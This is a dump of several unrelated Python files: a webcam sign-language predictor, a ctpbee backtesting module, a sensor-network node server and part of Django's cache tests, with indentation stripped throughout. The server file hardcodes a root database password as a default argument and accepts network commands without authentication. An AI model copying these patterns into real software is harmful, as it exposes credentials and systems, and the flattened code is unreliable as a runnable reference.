logger.log_background_messages(thread)
|
live_predict.py
|
from sys import argv
import cv2
import mediapipe as mp
import itertools
import numpy as np
import time
from collections import deque
from multiprocessing import Queue, Process
from queue import Empty
import atexit
from math import ceil
from pathlib import Path
import holistic
import common
USE_HOLISTIC = False
PRINT_FREQ = 30
PRED_FREQ = 5
assert PRINT_FREQ % PRED_FREQ == 0
LABELS = common.get_labels('data/')
def video_loop(feature_q, prediction_q, use_holistic):
cap = cv2.VideoCapture(0)
fourcc = cv2.VideoWriter_fourcc(*'mp4v')
cap.set(cv2.CAP_PROP_FOURCC, fourcc)
if not cap.isOpened():
print("Error opening Camera")
fps = cap.get(cv2.CAP_PROP_FPS)
print("Webcam FPS = {}".format(fps))
width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
mp_drawing = mp.solutions.drawing_utils
print("Awaiting start signal from predict")
prediction_q.get()
timestamp = None
delay = 0
tag = deque([" "]*5, 5)
pdecay = time.time()
print("starting image cap")
for image, results in holistic.process_capture(cap, use_holistic):
newtime = time.time()
if timestamp is not None:
diff = newtime - timestamp
# Uncomment to print time between each frame
# print(diff)
timestamp = newtime
raw_flat_row = holistic.to_landmark_row(results, use_holistic)
normalized_row = holistic.normalize_features(raw_flat_row)
feature_q.put(np.array(normalized_row))
try:
out = prediction_q.get_nowait()
prediction = np.argmax(out)
if delay >= PRINT_FREQ:
if out[prediction] > .6:
print("{} {}%".format(
LABELS[prediction], out[prediction]*100))
if LABELS[prediction] not in [tag[-1], None, "None"]:
tag.append(LABELS[prediction])
pdecay = time.time()
else:
print("None ({} {}% Below threshold)".format(
LABELS[prediction], out[prediction]*100))
delay = 0
if feature_q.qsize() > 5:
print(
"Warning: Model feature queue overloaded - size = {}".format(feature_q.qsize()))
print("--> ", end='')
for i, label in enumerate(out):
print("{}:{:.2f}% | ".format(LABELS[i], label*100), end='')
print("\n")
except Empty:
pass
delay += 1
if time.time() - pdecay > 7:
tag = deque([" "]*5, 5)
holistic.draw_landmarks(image, results, use_holistic, ' '.join(tag))
cv2.imshow("SignSense", image)
def predict_loop(feature_q, prediction_q, model_path):
import tensorflow as tf
import keras
import train
print("Starting prediction init")
train.init_gpu()
model = keras.models.load_model(model_path)
print("Sending ready to video loop")
prediction_q.put("start")
delay = 0
window = None
results = None
results_len = ceil(PRINT_FREQ / PRED_FREQ)
print("Starting prediction")
while True:
row = feature_q.get()
if window is None:
window = np.zeros((train.TIMESTEPS, len(row)))
# Discard oldest frame and append new frame to data window
window[:-1] = window[1:]
window[-1] = row
if delay >= PRED_FREQ:
out = model(np.array([window]))
if results is None:
results = np.zeros((results_len, len(LABELS)))
results[:-1] = results[1:]
results[-1] = out
prediction_q.put(np.mean(results, axis=0))
delay = 0
delay += 1
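# Hedged sketch of the windowing above (descriptive only): `window` is a FIFO of
# the last train.TIMESTEPS feature rows,
#   [f0, f1, f2, f3]  --new frame f4-->  [f1, f2, f3, f4]
# and roughly every PRED_FREQ frames one model output is pushed into `results`,
# so once that buffer has filled, the value put on prediction_q is the mean of
# the last PRINT_FREQ / PRED_FREQ (= 6) predictions, smoothing per-frame jitter.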
def live_predict(model_path, use_holistic):
f_q = Queue()
p_q = Queue()
p = Process(target=video_loop, args=(f_q, p_q, use_holistic,))
atexit.register(exit_handler, p)
p.start()
    predict_loop(f_q, p_q, model_path)
def exit_handler(p):
try:
p.kill()
except:
print("Couldn't kill video_loop")
if __name__ == "__main__":
model_path = argv[1]
# Use MP Hands only
live_predict(model_path, USE_HOLISTIC)
|
vessel.py
|
"""
Backtest vessel module.
"""
import os
from threading import Thread
from time import sleep
from ctpbee.log import VLogger
from ctpbee.looper.data import VessData
from ctpbee.looper.interface import LocalLooper
from ctpbee.cprint_config import CP
class LooperApi:
def __init__(self, name):
self.name = name
    def on_bar(self, bar):
        raise NotImplementedError
    def on_tick(self, tick):
        raise NotImplementedError
    def on_trade(self, trade):
        raise NotImplementedError
    def on_order(self, order):
        raise NotImplementedError
    def on_position(self, position):
        raise NotImplementedError
    def on_account(self, account):
        raise NotImplementedError
    def on_contract(self, contract):
        raise NotImplementedError
def init_params(self, data):
""" 用户需要继承此方法"""
# print("我在设置策略参数")
class LooperLogger:
def __init__(self, v_logger=None):
if v_logger:
self.logger = v_logger
else:
self.logger = VLogger(CP, app_name="Vessel")
self.logger.set_default(name=self.logger.app_name, owner='App')
def info(self, msg, **kwargs):
kwargs['owner'] = "Looper"
self.logger.info(msg, **kwargs)
def error(self, msg, **kwargs):
kwargs['owner'] = "Looper"
self.logger.error(msg, **kwargs)
def debug(self, msg, **kwargs):
kwargs['owner'] = "Looper"
self.logger.debug(msg, **kwargs)
def warning(self, msg, **kwargs):
kwargs['owner'] = "Looper"
self.logger.warning(msg, **kwargs)
def __repr__(self):
return "LooperLogger -----> just enjoy it"
class Vessel:
"""
    Strategy execution vessel.
    Supports local backtesting as well as backtesting on pushed online data.
    >> Whether a mode based on pushed online data could reduce memory usage on this machine.
"""
def __init__(self, logger_class=None, pattern="T0"):
self.ready = False
self.looper_data: VessData = None
if logger_class:
self.logger = logger_class()
else:
self.logger = LooperLogger()
self.risk = None
self.strategy = None
self.interface = LocalLooper(logger=self.logger, strategy=self.strategy, risk=self.risk)
self.params = dict()
self.looper_pattern = pattern
"""
        _data_status : data status; should be set to True once the data is ready
        _looper_status: backtest status, one of five values:
            "unready": not ready
            "ready": ready
            "running": running
            "stopped": paused
            "finished": finished
        _strategy_status: strategy status; should be set to True once a strategy is loaded
        _risk_status: risk-control status
"""
self._data_status = False
self._looper_status = "unready"
self._strategy_status = False
self._risk_status = True
def add_strategy(self, strategy):
""" 添加策略到本容器 """
self.strategy = strategy
self.interface.update_strategy(strategy)
self._strategy_status = True
self.check_if_ready()
def add_data(self, data):
""" 添加data到本容器, 如果没有经过处理 """
d = VessData(data)
self.looper_data = d
self._data_status = True
self.check_if_ready()
def check_if_ready(self):
if self._data_status and self._strategy_status and self._risk_status:
self._looper_status = "ready"
self.ready = True
def add_risk(self, risk):
""" 添加风控 """
self._risk_status = True
self.interface.update_risk(risk)
self.check_if_ready()
def set_params(self, params):
if not isinstance(params, dict):
raise ValueError(f"配置信息格式出现问题, 你当前的配置信息为 {type(params)}")
self.params = params
def get_result(self):
""" 计算回测结果,生成回测报告 """
return self.interface.account.result
    def letsgo(self, params, ready):
        if self.looper_data.init_flag:
            self.logger.info(f"Product: {self.looper_data.product}")
            self.logger.info(f"Backtest mode: {self.looper_pattern}")
        for x in range(self.looper_data.length):
            if ready:
                """ Ready: keep stepping through the backtest. """
                try:
                    p = next(self.looper_data)
                    self.interface(p, params)
                except StopIteration:
                    self._looper_status = "finished"
                    break
            else:
                """ Not ready: pause the backtest until resumed. """
                sleep(1)
        self.logger.info("Backtest finished, generating report")
def suspend_looper(self):
""" 暂停回测 """
self.ready = False
self._looper_status = "stopped"
def enable_looper(self):
""" 继续回测 """
self.ready = True
self._looper_status = "running"
@property
def looper_status(self):
return self._looper_status
@property
def risk_status(self):
return self._risk_status
@property
def data_status(self):
return self._data_status
@property
def strategy_status(self):
return self._strategy_status
@property
def status(self):
return (self._looper_status, self._risk_status, self._strategy_status, self._data_status)
def run(self):
""" 开始运行回测 """
p = Thread(name="looper", target=self.letsgo, args=(self.params, self.ready,))
p.start()
p.join()
def __repr__(self):
return "ctpbee Backtesting Vessel powered by ctpbee current version: 0.1"
|
server.py
|
# Copyright 2020 Center for Intelligent and Networked Systems, Department of Automation, Tsinghua University, Beijing, China.
# This program is distributed under the Apache license 2.0.
# Supported by National Key Research and Development Project of China (No. 2017YFC0704100 entitled New generation intelligent building platform techniques) and the National Natural Science Foundation of China (No. 61425027), the 111 International Collaboration Program of China under Grant BP2018006.
import json
import threading
import socket
import random
import sys
import time
import question
import traceback
import pysnooperDB
# import pysnooper
class Sensor(object):
sensorID = 0
IP = ""
PORT = []
IPlist = []
sensorInfo = {}
adjID = []
adjDirection = []
datalist = []
GUIinfo = []
taskID = ""
parentID = 0
sonID = []
sonFlag = []
sonData = []
mesQue = []
threads = []
flag = 0
sonFlag2 = 0
treeFlag = 0
dataFlag = 0
taskFlag = 0
taskBeginFlag = 0
tk = 0
adjData = []
adjDataList = []
adjFeedback = []
adjFlag = []
adjFlag2 = 0
adjFeedbackFlag = []
adjFeedbackFlag2 = 0
adjSyncStatus = []
adjSyncFlag = 0
observelist = []
tablenamePrefix = ''
user=''
passwd=''
databasename = ''
debugmode_flag = 0
def __init__(self, ID, adjID, adjDirection, IPlist,IP,PORT,datalist, tablenamePrefix = 'task', observelist = [],\
user = 'root', passwd = '08191920.yh',databasename = 'TESTDB', debugmode_flag = 0):
self.sensorID = int(ID)
self.parentID = int(ID)
self.IP = IP
self.PORT = PORT
self.adjID = adjID
self.adjDirection = adjDirection
self.IPlist = IPlist
self.datalist = datalist
self.IP = socket.gethostbyname(self.IP)
self.observelist = observelist
self.tablenamePrefix = tablenamePrefix
self.user = user
self.passwd = passwd
self.databasename = databasename
self.debugmode_flag = debugmode_flag
for i in range(len(self.adjID)):
self.adjData.append([])
# self.adjDataList.append([])
self.adjFeedback.append([])
self.adjFlag.append(0)
self.adjFeedbackFlag.append(0)
self.adjSyncStatus.append(0)
# @pysnooper.snoop("sever_create.log")
def createServer(self,host, port):
cont = """HTTP/1.1 200 OK\r\n\r\n"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(100)
print ("Server on " + host + ":" + str(port))
while 1:
conn, addr = s.accept()
request = conn.recv(655350)
request = bytes.decode(request)
method = request.split(' ')[0]
if method == 'POST':
form = request.split('\r\n')
data = form[-1]
try:
jdata = json.loads(data)
except Exception:
self.sendUDP("通信JSON数据格式错误")
else:
                    # Communication Topology Construction
if jdata["key"] == "connect":
if self.flag == 0:
self.flag = 1
self.parentID = jdata["id"]
print (host + ":" + str(port) + " connected to " + jdata["host"] + ":" + str(jdata["port"]))
data = {
"key": "connect",
"host": host,
"port": port,
"id": self.sensorID
}
ndata = json.dumps(data)
content = cont + ndata
conn.sendall(str.encode(content))
for ele in self.IPlist:
if ele != []:
if ele[4] != self.parentID:
self.connect(ele[0],ele[1],ele[2],ele[3])
#leaf?
if len(self.sonID) == 0:
data = {
"key": "OK",
"id": self.sensorID
}
ndata = json.dumps(data)
self.send(jdata["id"], data=ndata)
for i in range(len(self.sonFlag)):
self.sonFlag[i] = 0
else:
data = {
"key": "connected",
"host": host,
"port": port,
"id": self.sensorID
}
mdata = json.dumps(data)
content = cont + mdata
conn.sendall(str.encode(content))
elif jdata["key"] == "OK":
data = {
"key": "OK",
"id": self.sensorID
}
ndata = json.dumps(data)
for i in range(len(self.sonID)):
if self.sonID[i] == jdata["id"]:
self.sonFlag[i] = 1
nflag = 1
for ele in self.sonFlag:
if ele == 0:
nflag = 0
if nflag == 1:
if self.parentID != self.sensorID:
for ele in self.IPlist:
if ele != []:
if ele[4] == self.parentID:
self.send(ele[4], data=ndata)
else:
self.treeFlag = 1
print ("The whole tree has been constructed!")
for i in range(len(self.sonFlag)):
self.sonFlag[i] = 0
# Task Distribution
elif jdata["key"] == "task":
self.taskID = jdata["taskID"]
try:
self.GUIinfo.append(jdata["GUIinfo"][0])
self.GUIinfo.append(jdata["GUIinfo"][1])
self.sendUDP("任务开始执行")
except Exception as e:
print ("非来自GUI的任务请求")
if self.sonID != 0:
for ele in self.IPlist:
if ele != []:
if ele[4] in self.sonID:
sjdata = json.dumps(jdata)
self.send(ele[4], data=sjdata)
self.taskBeginFlag = 1
# Data Collection
elif jdata["key"] == "data":
mdata = jdata["data"]
for i in range(len(self.sonID)):
if self.sonID[i] == jdata["id"]:
self.sonData[i] = mdata
self.sonFlag[i] = 1
nflag = 1
for ele in self.sonData:
if ele == []:
nflag = 0
if nflag == 1:
self.sonFlag2 = 1
# question
elif jdata["key"] == "questionData":
if jdata["type"] == "value":
for i in range(len(self.adjID)):
if(self.adjID[i] == jdata["id"]):
self.adjFlag[i] = 1
self.adjData[i] = jdata["data"]
# self.adjDataList[i].append(jdata["data"])
nflag = 1
for ele in self.adjFlag:
if ele == 0:
nflag = 0
if nflag == 1:
self.adjFlag2 = 1
elif jdata["type"] == "feedback":
for i in range(len(self.adjID)):
if (self.adjID[i] == jdata["id"]):
self.adjFeedbackFlag[i] = 1
self.adjFeedback[i] = jdata["data"]
# self.adjDataList[i].append(jdata["data"])
nflag = 1
for ele in self.adjFeedbackFlag:
if ele == 0:
nflag = 0
if nflag == 1:
self.adjFeedbackFlag2 = 1
conn.send(str.encode(cont))
elif jdata["key"] == "sync":
for i in range(len(self.adjID)):
if(self.adjID[i] == jdata["id"]):
self.adjSyncStatus[i] = 1
nflag = 1
for ele in self.adjSyncStatus:
if ele == 0:
nflag = 0
if nflag == 1:
self.adjSyncFlag = 1
else:
conn.send(str.encode(cont+"请不要直接访问通信服务器"))
else:
conn.send(str.encode(cont + "请不要直接访问通信服务器"))
conn.close()
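    # Hedged summary of the handshake above (descriptive comment only): the first
    # "connect" a node receives fixes its parent; the node then connects to every
    # other neighbour in IPlist, and each neighbour that answers with key "connect"
    # becomes one of its children. A leaf reports "OK" to its parent right away,
    # an inner node forwards "OK" only after all of its children have reported, so
    # the root's treeFlag flips to 1 exactly when the whole spanning tree is built.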
#Task Server
# @pysnooper.snoop("sever_task.log")
def taskServer(self,host,port):
cont = """HTTP/1.1 200 OK\r\n\r\n"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(100)
print ("TaskServer: " + host + ":" + str(port))
while 1:
conn, addr = s.accept()
request = conn.recv(10000000)
request = bytes.decode(request)
method = request.split(' ')[0]
if method == "POST":
form = request.split('\r\n')
data = form[-1]
try:
jdata = json.loads(data)
except (ValueError, KeyError, TypeError):
conn.send(str.encode(cont + "请输入JSON格式的数据!"))
else:
if jdata["key"] == "task":
try:
self.GUIinfo.append(jdata["GUIinfo"][0])
self.GUIinfo.append(jdata["GUIinfo"][1])
self.sendUDP("接收任务请求")
except KeyError:
print ("非来自GUI的任务请求")
self.flag = 1
self.taskID = jdata["taskID"]
sum = 0
for ele in self.IPlist:
if ele != []:
self.connect(ele[0], ele[1], ele[2], ele[3])
sum += 1
if(sum == 0): self.treeFlag = 1
                        while self.treeFlag == 0: time.sleep(0.01)
                        self.sendUDP("Communication tree constructed")
                        self.sendUDP("Task execution started")
for ele in self.IPlist:
if ele != []:
sdata = {
"key": "task",
"taskID": self.taskID,
"GUIinfo": self.GUIinfo
}
sjdata = json.dumps(sdata)
self.send(ele[4], data=sjdata)
self.taskBeginFlag = 1
                        while self.taskFlag == 0: time.sleep(0.01)
                        while self.dataFlag == 0: time.sleep(0.01)
                        self.sendUDP("Data collection complete")
if self.taskID == "averageTemperature":
sum = 0
for ele in self.mesQue:
sum = sum + ele["info"]["temperature"]
content = cont + "sensorID:" + str(self.sensorID) + "\n" + "dataNum:" + str(len(self.mesQue)) + "\naverage:" + str(float(sum)/len(self.mesQue))
else:
info = []
for i in range(len(self.mesQue)):
info.append({})
info[i]["value"] = self.mesQue[i]["info"]["value"]
info[i]["ID"] = self.mesQue[i]["id"]
content = cont + "sensorID:" + str(self.sensorID) + "\n" + "dataNum:" + str(len(self.mesQue)) + "\nInfo:" + str(info)
conn.sendall(str.encode(content))
self.reset()
self.treeFlag = 0
self.dataFlag = 0
elif jdata["key"] == "newNode":
self.IPlist = jdata["IPlist"]
self.adjID.append(jdata["id"])
elif jdata["key"] == "deleteNode":
self.IPlist = jdata["IPlist"]
self.adjID = jdata["adjID"]
else:
conn.send(str.encode(cont + "您输入的任务信息有误!"))
else:
conn.send(str.encode(cont + "暂未提供GET接口返回数据"))
conn.close()
# @pysnooper.snoop("sever_connect.log")
def connect(self,host1,port1,host2,port2):
print (host1 + ":" + str(port1) + " connecting to " + host2 + ":" + str(port2))
data = {
"key": "connect",
"host": host1,
"port": port1,
"id": self.sensorID
}
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote_ip = socket.gethostbyname(host2)
s.connect((remote_ip, port2))
message = "POST / HTTP/1.1\r\n\r\n"
jsondata = json.dumps(data)
message += jsondata
s.sendall(str.encode(message))
reply = s.recv(10000)
reply = bytes.decode(reply)
res = reply.split('\r\n')[-1]
jres = json.loads(res)
if jres['key'] == 'connect':
self.sonID.append(jres["id"])
self.sonFlag.append(0)
self.sonData.append([])
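    # Hedged illustration (descriptive comment only): every peer-to-peer message is
    # a minimal HTTP/1.1 POST whose body is a single JSON object, e.g.
    #   POST / HTTP/1.1\r\n\r\n{"key": "connect", "host": "1.2.3.4", "port": 8001, "id": 3}
    # createServer() splits the request on '\r\n' and json-decodes the last segment.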
def send(self,id,data):
for ele in self.IPlist:
if ele!=[]:
if ele[4] == id:
host = ele[2]
port = ele[3]
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote_ip = socket.gethostbyname(host)
s.connect((remote_ip, port))
message = "POST / HTTP/1.1\r\n\r\n"
message += data
s.sendall(str.encode(message))
break
def sendDataToID(self, id, data):
data = {
"key": "questionData",
"type": "value",
"id": self.sensorID,
"data": data
}
ndata = json.dumps(data)
for ele in self.IPlist:
if ele != []:
if ele[4] == id:
self.send(ele[4], ndata)
def sendDataToDirection(self, direction, data):
data = {
"key": "questionData",
"type": "value",
"id": self.sensorID,
"data": data
}
ndata = json.dumps(data)
for i in range(len(self.adjID)):
if self.adjDirection[i] == direction:
for ele in self.IPlist:
if ele != []:
if ele[4] == self.adjID[i]:
self.send(ele[4], ndata)
def sendData(self, data):
data = {
"key": "questionData",
"type": "value",
"id": self.sensorID,
"data": data
}
ndata = json.dumps(data)
for ele in self.IPlist:
if ele != []:
self.send(ele[4], ndata)
def receive(self):
return self.adjData
# @pysnooper.snoop("sever_udp.log")
def sendUDP(self, info):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
addr = (self.GUIinfo[0], self.GUIinfo[1])
data = {
"key": "runData",
"id": self.sensorID,
"info": info
}
s.sendto(json.dumps(data).encode('utf-8'), addr)
s.close()
except Exception as e:
print (info)
def taskFunction(self):
while 1:
time.sleep(0.01)
if self.taskBeginFlag == 1:
self.taskBeginFlag = 0
if self.taskID == "averageTemperature":
self.sensorInfo["temperature"] = random.randint(20,30)
self.taskFlag = 1
elif self.taskID == "sonID":
self.sensorInfo["value"] = self.sonID
self.taskFlag = 1
elif self.taskID == "question":
try:
if self.debugmode_flag:
tablename = self.tablenamePrefix + "_node" + str(self.sensorID)
filename = "./log/" + self.tablenamePrefix + "_node" + str(self.sensorID) + '.log'
                            # variables to observe
# self.observelist = ["m","x","adjData"]
# taskfunc = pysnooper.snoop(filename)(question.taskFunction)
taskfunc = pysnooperDB.snoop(tablename = tablename,observelist = self.observelist,\
user= self.user, passwd= self.passwd,databasename = self.databasename)(question.taskFunction)
else:
taskfunc = question.taskFunction
value = taskfunc(self, self.sensorID, self.adjDirection, self.datalist)
self.sensorInfo["value"] = value
self.sendUDP("任务执行完毕")
print (value)
except Exception as e:
self.sensorInfo["value"] = ""
self.sendUDP("任务执行出错")
self.sendUDP(traceback.format_exc())
self.taskFlag = 1
if self.sonID == []:
if self.parentID == self.sensorID:
sdata = {
"id": self.sensorID,
"info": self.sensorInfo
}
self.mesQue.append(sdata)
self.dataFlag = 1
print ("The whole data has been transmitted!")
else:
sdata = {
"id": self.sensorID,
"info": self.sensorInfo
}
self.mesQue.append(sdata)
data = {
"key": "data",
"id": self.sensorID,
"data": self.mesQue
}
ndata = json.dumps(data)
self.send(self.parentID, ndata)
self.reset()
else:
                    while self.sonFlag2 == 0: time.sleep(0.01)
sdata = {
"id": self.sensorID,
"info": self.sensorInfo
}
self.mesQue.append(sdata)
for ele in self.sonData:
for ele2 in ele:
self.mesQue.append(ele2)
if self.parentID != self.sensorID:
data = {
"key": "data",
"id": self.sensorID,
"data": self.mesQue
}
ndata = json.dumps(data)
self.send(self.parentID, data=ndata)
self.reset()
else:
self.dataFlag = 1
print ("The whole data has been transmitted!")
# @pysnooper.snoop("sever_run.log")
def run(self):
        # create the interface servers
for i in range(6):
t = threading.Thread(target=self.createServer,args=(self.IP,self.PORT[i],))
self.threads.append(t)
taskServerthread = threading.Thread(target=self.taskServer,args=(self.IP,self.PORT[6],))
taskthread = threading.Thread(target=self.taskFunction, args=())
for i in range(6):
self.threads[i].start()
taskServerthread.start()
taskthread.start()
for i in range(6):
self.threads[i].join()
taskServerthread.join()
taskthread.join()
def shutdown(self):
sys.exit(0)
def reset(self):
self.parentID = self.sensorID
self.flag = 0
self.sonID = []
self.mesQue = []
self.sonFlag = []
self.sonFlag2 = 0
self.sonData = []
def transmitData(self,tmp2):
if (self.tk % 2 == 0):
self.tk += 1
data = {
"key": "questionData",
"type": "value",
"id": self.sensorID,
"data": tmp2
}
ndata = json.dumps(data)
for ele in self.IPlist:
if ele != []:
self.send(ele[4], ndata)
            while self.adjFlag2 == 0: time.sleep(0.01)
tmp = json.loads(json.dumps([self.adjDirection, self.adjData]))
self.adjFlag2 = 0
for i in range(len(self.adjData)):
self.adjData[i] = []
for i in range(len(self.adjFlag)):
self.adjFlag[i] = 0
return tmp
else:
self.tk += 1
data = {
"key": "questionData",
"type": "feedback",
"id": self.sensorID,
"data": tmp2
}
ndata = json.dumps(data)
for ele in self.IPlist:
if ele != []:
self.send(ele[4], ndata)
            while self.adjFeedbackFlag2 == 0: time.sleep(0.01)
tmp = json.loads(json.dumps([self.adjDirection, self.adjFeedback]))
for i in range(len(self.adjFeedback)):
self.adjFeedback[i] = []
for i in range(len(self.adjFeedbackFlag)):
self.adjFeedbackFlag[i] = 0
self.adjFeedbackFlag2 = 0
return tmp
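    # Hedged note (descriptive comment only): transmitData alternates between a
    # "value" round (even self.tk) and a "feedback" round (odd self.tk). Each call
    # broadcasts tmp2 to every neighbour, blocks until a message of the matching
    # type has arrived from every adjacent node, and returns
    # [adjDirection, received data] before clearing the per-neighbour buffers.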
def syncNode(self):
data = {
"key": "sync",
"id": self.sensorID
}
ndata = json.dumps(data)
for ele in self.IPlist:
if ele != []:
self.send(ele[4], ndata)
while self.adjSyncFlag == 0:
time.sleep(0.01)
self.adjSyncFlag = 0
for i in range(len(self.adjSyncStatus)):
self.adjSyncStatus[i] = 0
return 0
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
import copy
import os
import re
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheKeyWarning, cache, caches,
)
from django.core.cache.utils import make_template_fragment_key
from django.db import connection, connections, transaction
from django.http import HttpRequest, HttpResponse, StreamingHttpResponse
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, TestCase, TransactionTestCase, override_settings,
)
from django.test.signals import setting_changed
from django.utils import six, timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control,
patch_response_headers, patch_vary_headers,
)
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
from .models import Poll, expensive_calculation
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpickable(object):
def __getstate__(self):
raise pickle.PickleError()
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(TestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertTrue(result)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Non-existent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertIsNone(cache.get("key1"))
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertFalse(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr, 'answer')
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr, 'answer')
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertIsNone(cache.get("expire2"))
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
cache.set_many({'a': 1, 'b': 2})
cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr_version, 'answer')
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr_version, 'answer')
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
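# Hedged worked example (values chosen for illustration only):
# custom_key_func('answer', 'prefix', 2) returns 'CUSTOM-prefix-2-answer'.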
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, **params):
# `base` is used to pull in the memcached config from the original settings,
    # `params` are test specific overrides and `_caches_setting_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
setting = {k: base.copy() for k in _caches_setting_base.keys()}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
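# Hedged worked example (values chosen for illustration only): with
# base={'BACKEND': 'x'} and params={'TIMEOUT': 1}, the resulting 'v2' alias is
# {'BACKEND': 'x', 'VERSION': 2, 'TIMEOUT': 1} -- params override
# _caches_setting_base, which in turn overrides the shared base config.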
class BaseCacheTests(object):
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertDictEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertDictEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
